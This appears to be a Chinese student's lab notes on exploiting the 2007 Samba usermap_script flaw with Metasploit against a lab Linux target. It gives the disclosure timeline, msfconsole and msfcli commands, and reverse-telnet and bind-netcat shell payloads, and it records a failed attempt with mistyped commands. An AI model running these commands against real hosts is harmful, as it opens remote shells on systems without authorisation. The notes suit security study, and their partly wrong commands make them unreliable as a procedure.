1.搜索Samba服务usermap_script安全漏洞相关信息
根据下面的连接,搜索到如下内容:
The time line is as follows: * May 7, 2007: Initial defect disclosure to the security@samba.org email alias. * May 7, 2007: Initial developer response by Samba developer Gerald Carter. * May 9, 2007: Patch released by Samba developer Jeremy Allison to iDefense for testing. * May 10, Announcement to vendor-sec mailing list * May 14, 2007: Public announcement of the security issue. 该漏洞的生命周期图,不会,略过2.msfconsole 更新apt-get update
metasploit攻击模块路径:
dpkg -S metasploit kali:/usr/share/metasploit-framework/modules/exploits BT5:/opt/framework3/msf3/modules/exploits linuxshell 统计针对windows2000 windowsxp。。。。目标环境的攻击模块数量(不知道)3.运行metasploit完成对Linux靶机usermap_script攻击
kali: msfconsole
msf>show exploits
msf>use exploit/multi/samba/usermap_script
msf> use exploit/multi/samba/usermap_script msf> show options msf> set RHOST 192.168.213.133 msf> exploit 尝试使用VNC图形化远程控制工具的攻击载荷我的做法:
msf exploit(usermap_script) > show payloads
msf exploit(usermap_script) > set PAYLOADS cmd/unix/reverse_ssl_double_telnet
msf exploit(usermap_script) > exploits
攻击失败了,但是流程应该是这样的????求解答
4.msfcli -h
msfconsole
msf>show payloads
msf>vim 1.attack.sh
msfcli multi/samba/usermap_script PAYLOAD=/cmd/unix/bind_netcat RHOST=$1 E msf>sh 1.attack.sh 192.168.213.133
